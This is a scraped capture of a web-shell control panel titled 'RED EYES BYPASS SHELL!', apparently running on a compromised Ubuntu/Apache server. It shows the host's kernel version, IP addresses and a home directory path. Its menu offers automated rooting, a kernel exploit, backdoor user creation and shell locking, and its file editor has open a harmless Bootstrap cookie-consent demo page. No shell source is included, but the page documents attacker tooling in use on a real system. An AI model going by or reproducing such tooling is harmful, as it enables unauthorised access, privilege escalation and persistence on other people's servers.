Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
pdpa /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
assets
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
License.pdf
252.23
KB
-rwxr-xr-x
README.md
11.44
KB
-rwxr-xr-x
basic.html
2.18
KB
-rwxr-xr-x
package.json
853
B
-rwxr-xr-x
with-checkboxes.html
3.96
KB
-rwxr-xr-x
with-icon.html
2.51
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : with-checkboxes.html
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /> <meta http-equiv="x-ua-compatible" content="ie=edge" /> <title>Material Design for Bootstrap</title> <!-- MDB icon --> <link rel="icon" href="img/mdb-favicon.ico" type="image/x-icon" /> <!-- Font Awesome --> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" /> <!-- Google Fonts Roboto --> <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500;700;900&display=swap" /> <!-- MDB --> <link rel="stylesheet" href="css/mdb.min.css" /> </head> <body> <!-- Start your project here--> <div class="container d-flex justify-content-center mt-5"> <!-- Button trigger modal --> <button type="button" class="btn btn-primary" data-mdb-toggle="modal" data-mdb-target="#cookieconsent3"> Launch cookie consent </button> <!-- Modal --> <div class="modal top fade" id="cookieconsent3" tabindex="-1" aria-labelledby="cookieconsentLabel3" aria-hidden="true" data-mdb-backdrop="static" data-mdb-keyboard="false"> <div class="modal-dialog"> <div class="modal-content d-block text-start"> <div class="modal-header d-block "> <h5 class="modal-title" id="cookieconsentLabel3">Cookies & Privacy</h5> <p> This website uses cookies to ensure you get the best experience on our website. </p> <p> <a href="#">Read more about cookies</a> </p> </div> <div class="modal-body"> <!-- Necessary checkbox --> <div class="form-check"> <input class="form-check-input" type="checkbox" value="" id="necessary" checked /> <label class="form-check-label" for="necessary"> <p> <strong>Necessary cookies</strong> <muted>help with the basic functionality of our website, e.g remember if you gave consent to cookies.</muted> </p> </label> </div> <!-- Analytical checkbox --> <div class="form-check"> <input class="form-check-input" type="checkbox" value="" id="analytical" /> <label class="form-check-label" for="analytical"> <p> <strong>Analytical cookies</strong> <muted>make it possible to gather statistics about the use and trafiic on our website, so we can make it better.</muted> </p> </label> </div> <!-- Marketing checkbox --> <div class="form-check"> <input class="form-check-input" type="checkbox" value="" id="marketing" /> <label class="form-check-label" for="marketing"> <p> <strong>Marketing cookies</strong> <muted>make it possible to show you more relevant social media content and advertisements on our website and other platforms.</muted> </p> </label> </div> </div> <div class="modal-footer"> <button type="button" class="btn btn-outline-primary" data-mdb-dismiss="modal"> Accept necessary </button> <button type="button" class="btn btn-primary" data-mdb-dismiss="modal"> Accept all </button> </div> </div> </div> </div> <!-- Modal --> </div> <!-- Modal --> </div> <!-- End your project here--> <!-- MDB --> <script type="text/javascript" src="js/mdb.min.js"></script> <!-- Custom scripts --> <script type="text/javascript"></script> </body> </html>
Close